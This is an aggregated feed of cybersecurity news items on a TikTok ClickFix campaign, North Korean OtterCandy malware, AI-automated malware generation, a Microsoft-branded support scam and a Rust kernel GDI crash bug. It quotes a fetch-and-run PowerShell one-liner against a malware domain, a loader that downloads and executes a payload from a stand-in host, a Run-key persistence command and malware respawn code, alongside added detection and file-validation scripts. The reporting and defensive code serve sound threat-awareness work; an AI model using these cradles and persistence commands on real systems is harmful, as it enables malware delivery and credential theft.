• Cybercriminals are exploiting TikTok’s massive user base to distribute sophisticated malware campaigns that promise free software activation but deliver dangerous payloads instead.

    The attack leverages social engineering tactics reminiscent of the ClickFix technique, where unsuspecting users are tricked into executing malicious PowerShell commands on their systems.

    Victims encounter TikTok videos offering free activation of popular software like Photoshop, with one such video accumulating over 500 likes before detection.

    The attack chain begins when users follow instructions to open PowerShell with administrator privileges and execute a deceptively simple one-liner command.

    The initial infection vector instructs victims to run the command iex (irm slmgr[.]win/photoshop), which fetches and executes malicious PowerShell code from a remote server.

    This first-stage payload (SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23) achieved a VirusTotal detection rate of 17/63, demonstrating its evasive capabilities.

    The script downloads a secondary executable called updater.exe from hxxps://file-epq[.]pages[.]dev/updater.exe, which analysis revealed as AuroStealer malware designed to harvest sensitive credentials and system information.

    Fake TikTok video (Source – Internet Storm Center)

    Internet Storm Center researchers identified the campaign and discovered that persistence mechanisms are implemented through scheduled tasks disguised as legitimate system processes.

    The malware randomly selects task names such as “MicrosoftEdgeUpdateTaskMachineCore” to blend in with genuine Windows services, ensuring execution at every user logon.

    A third payload named source.exe (SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011) introduces an advanced evasion technique by compiling C# code on-demand during runtime using the .NET Framework compiler located at C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe.

    Self-Compiling Technique and Memory Injection

    The self-compiling capability represents a sophisticated approach to evade traditional detection mechanisms.

    The malware compiles a C# class during execution that imports kernel32.dll functions including VirtualAlloc, CreateThread, and WaitForSingleObject.

    This dynamically compiled code allocates executable memory space, injects shellcode directly into the process memory, and creates a new thread to execute the malicious payload without writing additional files to disk.

    Researchers discovered multiple variations of this campaign across TikTok targeting users searching for cracked versions of various software applications, highlighting the importance of avoiding untrusted sources for software downloads.


    The post Hackers Using TikTok Videos to Deploy Self-Compiling Malware That Leverages PowerShell for Execution appeared first on Cyber Security News.


  • Cybercriminals associated with the North Korean threat group WaterPlum, also known as Famous Chollima or PurpleBravo, have escalated their activities with a sophisticated new malware strain called OtterCandy.

    This cross-platform RAT and information stealer represents a dangerous evolution in the group’s capabilities, combining features from previously observed malware families RATatouille and OtterCookie to create a more potent weapon for credential theft and system compromise.

    The malware emerges as part of WaterPlum’s ClickFake Interview campaign, a deceptive social engineering operation that masquerades as legitimate job recruitment processes in the blockchain and cryptocurrency sectors.

    Attackers create convincing fake company websites, such as BlockForgeX, which present seemingly authentic job applications and interview processes to lure unsuspecting victims into downloading malicious software under the guise of camera setup instructions or driver updates.

    ClickFake attack flow (Source – NTT Security)

    NTT Security researchers identified OtterCandy as the latest addition to WaterPlum’s arsenal, noting its deployment across Windows, macOS, and Linux platforms since July 2025.

    The malware’s impact extends beyond individual systems, as attacks have been observed targeting victims in Japan and other regions, demonstrating the threat group’s expanding global reach and ambitions.

    Built using Node.js, OtterCandy establishes communication with command-and-control servers through Socket.IO connections, enabling threat actors to execute a comprehensive range of malicious activities remotely.

    The malware’s command structure reveals its sophisticated design, implementing functions such as ‘imp’ for sweeping home directories, ‘pat’ for pattern-based file searches, and ‘upload’ for extracting system information, browser credentials, and cryptocurrency wallet data.

    Advanced Persistence and Evasion Mechanisms

    OtterCandy demonstrates remarkable resilience through its multi-layered persistence strategy that ensures continued operation even after detection attempts.

    ClickFix webpage (Source – NTT Security)

    While the malware typically relies on the preceding DiggingBeaver component for initial persistence, it incorporates an independent backup mechanism that automatically restarts processes when interrupted.

    This self-preservation feature uses Node.js process event handling to watch for SIGINT signals and respawn itself:

    // Modules implied by the excerpt (not shown in the original snippet)
    const { fork } = require('child_process');
    const path = require('path');

    function startChildProcess() {
        // Fork decode.js as a detached child with no stdio so it outlives the parent
        const _0x4777b5 = fork(path['join'](__dirname, 'decode.js'), [], {
            'detached': !![],
            'stdio': 'ignore'
        });
        _0x4777b5['unref']();
    }

    // On SIGINT (e.g. Ctrl-C), respawn the worker before the parent exits
    process['on']('SIGINT', () => {
        startChildProcess();
        process['exit']();
    });

    The malware’s August 2025 update introduced enhanced anti-forensic capabilities, including comprehensive trace deletion functions that remove registry entries, downloaded files, and temporary directories.

    This cleanup mechanism operates through the ‘ss_del’ command, systematically erasing evidence of compromise while maintaining operational security for the threat actors’ ongoing campaigns.


    The post Threat Actors Leveraging ClickFake Interview Attack to Deploy OtterCandy Malware appeared first on Cyber Security News.


  • Security teams around the world are grappling with a new breed of cyber threats that leverage advanced automation to identify software weaknesses and craft malicious payloads at unprecedented speed.

    Over the past year, adversaries have integrated machine-driven workflows into their operations, enabling opportunistic criminals and well-funded groups alike to discover zero-days and assemble malware with minimal human intervention.

    This evolution markedly lowers the barrier to entry for sophisticated attacks, extending capabilities once limited to nation-state actors to any motivated cybercriminal.

    The Microsoft Digital Defense Report highlights that attackers are no longer manually hunting for exploitable bugs through tedious code reviews or mass scanning.

    Instead, they are training large-scale models on publicly available code repositories, then directing the models to generate proof-of-concept exploits for specific targets.

    In parallel, the same automated pipelines transform these exploits into fully featured malware families by appending obfuscation layers, custom command-and-control routines, and persistence modules.

    Microsoft analysts noted that this end-to-end automation has reduced vulnerability turnaround time from weeks to mere hours, dramatically compressing the time Windows defenders have to patch critical systems.

    As organizations reflect on this shifting landscape, it becomes clear that traditional signature-based defenses offer diminishing returns.

    Real-time threat hunting and behavior-based detection must evolve to counter automatically generated threats.

    Microsoft researchers identified numerous incidents where bespoke malware variants—indistinguishable by signature from benign test code—evaded antivirus engines and sandbox environments, silently establishing footholds in enterprise networks.

    Most targeted sectors (Source – Microsoft)

    Security operations centers (SOCs) now face the dual challenge of high-velocity attack generation and increasingly evasive payloads.

    Understanding the infection mechanism

    A closer look at the automated infection chain reveals how attackers leverage scripting and orchestration frameworks to deliver and activate malicious code.

    Initially, the adversary’s AI model generates an exploit targeting a specific library or application component—such as a deserialization flaw in a widely deployed web framework.

    The model then crafts a loader script in PowerShell or Python that dynamically fetches the payload:

    $url = "https://malicious.example.com/payload.bin"
    $bytes = (New-Object Net.WebClient).DownloadData($url)
    [System.Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null, @())

    This loader script is injected into harmless-looking documents or served via spear-phishing emails, evading static defenses.

    Once executed, the loader decrypts and launches the generated malware in memory, bypassing disk-based detection.

    To maintain persistence, the automation pipeline appends code that registers a scheduled task or implants a fallback registry Run key:

    New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" `
      -Name "SysUpdate" -Value "powershell -ExecutionPolicy Bypass -File %UserProfile%\update.ps1"

    Microsoft analysts identified that many such scripts leverage randomized names and variable assignments, ensuring each campaign appears unique and further confounding detection logic.
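    A detection-side illustration covering both the TikTok ClickFix item earlier on this page (iex/irm cradle, csc.exe launched from PowerShell, scheduled task named after the Edge updater) and this report's loader and Run-key persistence. This is an added Python example, not code from either article, from the Internet Storm Center or from Microsoft. It applies a few hunting rules to constructed, Sysmon-style telemetry records; the Event shape, the scan function, the rule names and the legitimate Edge updater directory used as an allow-list entry are all assumptions to be tuned per environment.

```python
"""Hunting rules for PowerShell download cradles, runtime C# compilation and
lookalike persistence, run over constructed Sysmon-style telemetry."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    """One telemetry record: process creation, registry value set, or task registration."""
    kind: str                 # "process", "registry" or "task"
    image: str = ""           # executable path (process events)
    parent_image: str = ""    # parent executable path (process events)
    command_line: str = ""    # full command line (process events)
    target: str = ""          # registry value path, or scheduled-task name
    details: str = ""         # registry value data, or task action


# Command-line fragments typical of fetch-and-run-in-memory loaders.
CRADLE_PATTERNS = [
    (r"\biex\b.*\birm\b", "iex (irm ...) cradle"),
    (r"Invoke-Expression.*Invoke-(RestMethod|WebRequest)", "Invoke-Expression cradle"),
    (r"DownloadData|DownloadString", "WebClient download into memory"),
    (r"\[System\.Reflection\.Assembly\]::Load\(", "in-memory assembly load"),
    (r"-ExecutionPolicy\s+Bypass", "execution policy bypass"),
]
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
EDGE_TASK_RE = re.compile(r"^MicrosoftEdgeUpdateTaskMachine", re.I)
# Assumed location of the genuine Edge updater on a default install; tune per fleet.
EDGE_UPDATE_DIR = "c:\\program files (x86)\\microsoft\\edgeupdate\\"
POWERSHELL = ("powershell.exe", "pwsh.exe")


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def cradle_hits(text):
    """Labels of every cradle pattern found in a command line or registry value."""
    return [label for pat, label in CRADLE_PATTERNS if re.search(pat, text, re.I)]


def scan(events):
    """Apply the rules and return (rule_name, evidence) tuples in event order."""
    alerts = []
    for ev in events:
        if ev.kind == "process":
            img, parent = _basename(ev.image), _basename(ev.parent_image)
            if img in POWERSHELL:
                for hit in cradle_hits(ev.command_line):
                    alerts.append(("powershell_download_cradle", f"{hit}: {ev.command_line}"))
            # The .NET compiler launched by a shell is rare outside tooling that
            # compiles its injector at runtime, as the source.exe stage above does.
            if img == "csc.exe" and parent in POWERSHELL:
                alerts.append(("runtime_csharp_compile", f"{ev.parent_image} -> {ev.image}"))
        elif ev.kind == "registry" and RUN_KEY_RE.search(ev.target):
            if "powershell" in ev.details.lower():
                alerts.append(("run_key_powershell",
                               f"{ev.target} = {ev.details} [{', '.join(cradle_hits(ev.details))}]"))
        elif ev.kind == "task" and EDGE_TASK_RE.match(ev.target):
            # A familiar task name is only benign if the action is the real updater.
            if not ev.details.lower().startswith(EDGE_UPDATE_DIR):
                alerts.append(("lookalike_task", f"{ev.target} -> {ev.details}"))
    return alerts


# Constructed telemetry for demonstration; not records from the reported incidents.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
SAMPLE_EVENTS = [
    Event("process", PS, r"C:\Windows\explorer.exe",
          'powershell.exe -NoProfile -Command "iex (irm slmgr[.]win/photoshop)"'),
    Event("process", PS, r"C:\Windows\explorer.exe", "powershell.exe Get-Process | Sort-Object CPU"),
    Event("process", CSC, PS, "csc.exe /noconfig /fullpaths @C:\\Users\\bob\\AppData\\Local\\Temp\\x.cmdline"),
    Event("process", CSC, r"C:\Program Files\dotnet\MSBuild.exe", "csc.exe /noconfig @build.rsp"),
    Event("task", target="MicrosoftEdgeUpdateTaskMachineCore",
          details=r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe /c"),
    Event("task", target="MicrosoftEdgeUpdateTaskMachineCore",
          details=r"C:\Users\bob\AppData\Roaming\source.exe"),
    Event("registry", target=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SysUpdate",
          details=r"powershell -ExecutionPolicy Bypass -File %UserProfile%\update.ps1"),
    Event("registry", target=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
          details=r"C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
]

if __name__ == "__main__":
    for rule, evidence in scan(SAMPLE_EVENTS):
        print(f"{rule:28} {evidence}")
```

    Four of the eight constructed records trip a rule: the iex/irm cradle, csc.exe with a PowerShell parent, the Edge-named task pointing into a user profile, and the Run value launching PowerShell with -ExecutionPolicy Bypass. The benign PowerShell, MSBuild-driven csc.exe, genuine updater task and OneDrive Run value pass, which is the point of keying the task rule on the action path rather than on the name alone.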

    This fusion of automated vulnerability discovery and instantaneous malware generation marks a turning point in cyber offense.

    Defenders must prioritize continuous monitoring of anomalous behaviors, implement stringent application allow-listing, and adopt rapid patch orchestration to mitigate emerging threats before they can be weaponized.


    The post Hackers Using AI to Automate Vulnerability Discovery and Malware Generation – Microsoft Report appeared first on Cyber Security News.


  • Cybercriminals have discovered a gap in Zendesk’s ticket submission process and are using it to bombard victims with waves of misleading support messages. When configured to accept anonymous requests, however, the service can be abused to generate email floods that appear to come from legitimate corporate domains. Earlier this week, security blogger Brian Krebs was […]

    The post Attackers Exploit Zendesk Authentication Issue to Flood Targets’ Inboxes with Corporate Notifications appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • The North Korean threat actor linked to the Contagious Interview campaign has been observed merging some of the functionality of two of its malware programs, indicating that the hacking group is actively refining its toolset. That’s according to new findings from Cisco Talos, which said recent campaigns undertaken by the hacking group have seen the functions of BeaverTail and OtterCookie coming


  • A critical security vulnerability has been discovered in WatchGuard Firebox appliances that could allow remote attackers to execute arbitrary code without authentication. The flaw, identified as CVE-2025-9242, affects the IKEv2 VPN service and has been assigned a severity score of 9.3 under CVSS 4.0, marking it as a critical threat to organizations using these security […]

    The post WatchGuard VPN Flaw Allows Remote Attackers to Execute Arbitrary Code appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Attackers are exploiting TikTok’s massive reach to trick users into executing malware through seemingly innocuous videos. In one popular TikTok video (liked over 500 times), the attacker poses as a provider of a free Photoshop activation tool and urges viewers to open PowerShell as an administrator and run: iex (irm slmgr.win/photoshop). This command uses Invoke-Expression […]

    The post TikTok Videos Weaponized to Deliver Self-Compiling PowerShell Malware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • A new campaign has emerged that weaponizes Microsoft’s familiar branding to lure unsuspecting users into a sophisticated tech support scam.

    Victims receive a seemingly legitimate email, complete with Microsoft’s official logo, claiming there is an important financial transaction or security alert requiring immediate attention.

    The message prompts recipients to click a link under the guise of confirming identity or resolving an urgent issue.

    Cofense analysts noted that the threat actors have refined their social engineering tactics by combining payment lures with deceptive UI overlays to maximize impact.

    Upon clicking the link, users are redirected through a faux CAPTCHA challenge designed to mimic a trusted verification process.

    Redirect Page (Source -Cofense)

    When the victim completes the verification, they are led to a landing page where the browser appears locked by multiple pop-up windows styled after genuine Microsoft security alerts.

    Email Body (Source -Cofense)

    The attacker’s goal is to create a sense of panic, convincing the user that their system has been compromised beyond normal functionality.

    In many cases, the scam culminates in a displayed support phone number claiming to be Microsoft’s helpline.

    When the victim dials, they connect to a malicious actor posing as a support technician.

    Under the pretext of resolving the infection, the scammer persuades the target to divulge their Microsoft account credentials or install a remote desktop tool to “repair” the system, thereby granting full access to the attacker’s infrastructure.

    Infection Mechanism

    The infection chain involves a set of observed URLs that serve as redirectors and payload hosts. The initial redirector domains include:

    hxxps://alphadogprinting.com/index.php?8jl9lz
    hxxps://amormc.com/index.php?ndv5f1

    These URLs funnel victims through a CAPTCHA page before landing on the malicious overlay server. The payload domains, such as:

    hxxps://my.toruftuiov.com/9397b37a-50c4-48c0-899d-f5e87a24088d
    hxxps://deprivy.stified.sbs/proc.php

    host the scripted overlays that manipulate the DOM to disable mouse control and display counterfeit alerts.

    The browser lock is purely illusory and can be dismissed by pressing the ESC key, but few victims discover this before contacting the attacker.

    By blending trusted logos with multiple redirect stages and UI deception, this campaign exemplifies an evolving threat that leverages brand familiarity to facilitate credential theft.


    The post New Tech Support Scam with Microsoft’s Logo Tricks Users to Steal Login Credentials appeared first on Cyber Security News.


  • A North Korean-linked group, WaterPlum’s Cluster B, has evolved its tactics by introducing OtterCandy—a Node.js–based RAT and information stealer—through the ClickFake Interview campaign, with significant enhancements observed in August 2025. This threat actor, attributed to North Korea, orchestrated two primary campaigns: Contagious Interview and ClickFake Interview. Although multiple clusters operate under the WaterPlum umbrella, Cluster […]

    The post ClickFake Interview Campaign Used by Threat Actors to Deliver OtterCandy Malware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • A vulnerability has been discovered in Microsoft’s newly implemented Rust-based kernel component for the Graphics Device Interface (GDI) in Windows.

    This flaw, which could trigger a system-wide crash via a Blue Screen of Death (BSOD), highlights the challenges of integrating memory-safe languages into critical OS components.

    Although Microsoft classified it as moderate severity, the issue underscores potential risks in enterprise environments where attackers might weaponize it for widespread disruption.

    The vulnerability emerged during a targeted fuzzing campaign by Check Point, aimed at probing Windows’ graphics subsystem for weaknesses. Fuzzing, a technique that bombards software with malformed inputs to expose bugs, proved instrumental here.

    Using tools like WinAFL and WinAFL Pet on a controlled test setup, researchers focused on Enhanced Metafile Format (EMF) and EMF+ files, compact structures that instruct GDI how to render 2D graphics.

    These files, often embedded in documents or images, have long been a vector for exploits due to their complexity.

    Starting with just 16 seed files, the fuzzers quickly unearthed crashes ranging from information leaks to code execution risks in user-space components.

    But the real breakthrough came unexpectedly: repeated system restarts after BugChecks pointed to a kernel-level issue. Dubbed a “Denial of Fuzzing” condition, it halted testing and forced a pivot to kernel forensics.

    Windows Rust-based Kernel GDI Vulnerability

    To isolate the culprit, Check Point enhanced its setup with memory dump analysis using MemProcFS and Volatility, extracting mutated files from RAM disks.

    They refined the corpus iteratively, shrinking reproduction time from days to 30 minutes across 836 samples.

    A clever harness modification streamed mutations to a remote server via a custom C function and Python listener, capturing the precise 380,000th mutation that triggered the crash.

    Deep analysis revealed the bug in win32kbase_rs.sys, Microsoft’s Rust-rewritten driver for GDI regions.

    During path-to-region conversion in NtGdiSelectClipPath, an out-of-bounds array access in region_from_path_mut() invoked Rust’s panic_bounds_check(), causing a SYSTEM_SERVICE_EXCEPTION.

    Service Exception

    The trigger? A malformed EmfPlusDrawBeziers record with mismatched point counts (17 points declared as 4) and anomalous coordinates, combined with a wide-stroke pen from an EmfPlusObject.

    This malformed geometry stressed edge block handling, bypassing bounds in the singly linked list representation.
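    The record described above is the kind of input a gateway or sandbox can reject before it reaches a renderer. The following is an added Python example, not code from Check Point or Microsoft: a small EMF+ record walker that checks every EmfPlusDrawBeziers record for agreement between its declared Count and the point data its DataSize actually carries, and rejects streams whose record sizes are internally inconsistent. It assumes the EMF+ records have already been extracted from the EMR_COMMENT wrappers of the enclosing EMF file; the builder, the sample records and the problem strings are constructed for this example, and the relative-coordinate encoding is reported rather than decoded.

```python
"""Consistency checks for EMF+ DrawBeziers records (Count versus carried point data)."""
import struct

EMFPLUS_DRAWBEZIERS = 0x4019     # EmfPlusDrawBeziers record type (MS-EMFPLUS)
FLAG_COMPRESSED = 0x4000         # C bit: points are 16-bit integer pairs (4 bytes each)
FLAG_RELATIVE = 0x0800           # P bit: variable-length relative points (reported, not decoded)
HEADER = struct.Struct("<HHII")  # Type, Flags, Size (including header), DataSize


def parse_records(blob):
    """Yield (type, flags, body) for each EMF+ record; raise ValueError on structural faults."""
    off = 0
    while off < len(blob):
        if len(blob) - off < HEADER.size:
            raise ValueError(f"truncated record header at offset {off}")
        rtype, flags, size, data_size = HEADER.unpack_from(blob, off)
        if size != HEADER.size + data_size or size % 4:
            raise ValueError(f"inconsistent Size/DataSize at offset {off}")
        if off + size > len(blob):
            raise ValueError(f"record at offset {off} runs past end of stream")
        yield rtype, flags, bytes(blob[off + HEADER.size:off + size])
        off += size


def check_draw_beziers(flags, body):
    """Return human-readable problems for one DrawBeziers body (empty list if consistent)."""
    if flags & FLAG_RELATIVE:
        return ["relative point encoding: needs manual review"]
    if len(body) < 4:
        return ["missing Count field"]
    point_size = 4 if flags & FLAG_COMPRESSED else 8
    (count,) = struct.unpack_from("<I", body, 0)
    point_bytes = len(body) - 4
    problems = []
    if count * point_size > point_bytes:
        problems.append(f"Count {count} exceeds the {point_bytes // point_size} points present")
    elif point_bytes - count * point_size >= point_size:     # more than alignment padding left over
        problems.append(f"{point_bytes - count * point_size} bytes of point data beyond Count {count}")
    if count < 4:                                            # spec minimum for a Bezier path
        problems.append(f"Count {count} is below the minimum of 4")
    return problems


def audit(blob):
    """Map record index -> problems for every DrawBeziers record in an EMF+ record stream."""
    findings = {}
    for idx, (rtype, flags, body) in enumerate(parse_records(blob)):
        if rtype == EMFPLUS_DRAWBEZIERS:
            problems = check_draw_beziers(flags, body)
            if problems:
                findings[idx] = problems
    return findings


def build_draw_beziers(count, points, compressed=False, pen_id=0):
    """Construct a DrawBeziers record; Count is set explicitly so it can disagree with points."""
    flags = pen_id | (FLAG_COMPRESSED if compressed else 0)
    fmt = "<hh" if compressed else "<ff"
    body = struct.pack("<I", count) + b"".join(struct.pack(fmt, x, y) for x, y in points)
    body += b"\0" * (-len(body) % 4)            # DataSize must stay 4-byte aligned
    return HEADER.pack(EMFPLUS_DRAWBEZIERS, flags, HEADER.size + len(body), len(body)) + body


# Constructed sample stream (not from the Check Point corpus): one consistent record,
# one declaring 4 points while carrying 17, and one declaring 17 while carrying 4.
SQUARE = [(0.0, 0.0), (10.0, 0.0), (10.0, 10.0), (0.0, 10.0)]
SAMPLE_STREAM = (
    build_draw_beziers(4, SQUARE)
    + build_draw_beziers(4, [(float(i), float(i % 5)) for i in range(17)])
    + build_draw_beziers(17, [(0, 0), (10, 10), (20, 0), (30, 10)], compressed=True)
)

if __name__ == "__main__":
    for idx, problems in audit(SAMPLE_STREAM).items():
        print(f"record {idx}: " + "; ".join(problems))
```

    Both mismatch directions are caught because the check is done against the bytes actually present rather than against the declared Count alone, which is the value a parser would otherwise trust when sizing its edge list; a stream cut short is refused outright instead of being partially processed.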

    A simple PowerShell proof-of-concept demonstrated the exploit’s accessibility: embedding the crafted metafile in a Graphics object via System.Drawing led to an instant BSOD, even from low-privilege sessions on x86/x64 Windows 11 24H2.

    While not directly enabling remote code execution, it posed a potent denial-of-service threat: imagine an insider scripting crashes across an enterprise on a Friday evening.

    Microsoft patched the flaw in OS Build 26100.4202 via the KB5058499 preview on May 28, 2025, expanding the driver by 16KB with hardened logic.

    Key changes included two edge-handling routines, the original add_edge_original() and a bounds-checked add_edge_new(), gated by a feature flag. Full rollout followed in June, though initial testing showed the flag disabled.

    Check Point reported the issue promptly, but Microsoft’s MSRC deemed it a non-critical DoS, arguing Rust’s panic mechanism behaved as designed.

    This marks one of the first public Rust kernel bugs since the integration that Microsoft touted at BlueHat IL 2023 as enhancing security. While Rust mitigates overflows, it doesn’t eliminate design flaws or incomplete testing.

    As Windows leans into memory safety, such incidents remind developers: language alone isn’t a panacea. Thorough fuzzing and validation remain vital to prevent “alarm systems that blow up the house.”


    The post Windows Rust-based Kernel GDI Vulnerability Leads to Crash and Blue Screen of Death Error appeared first on Cyber Security News.
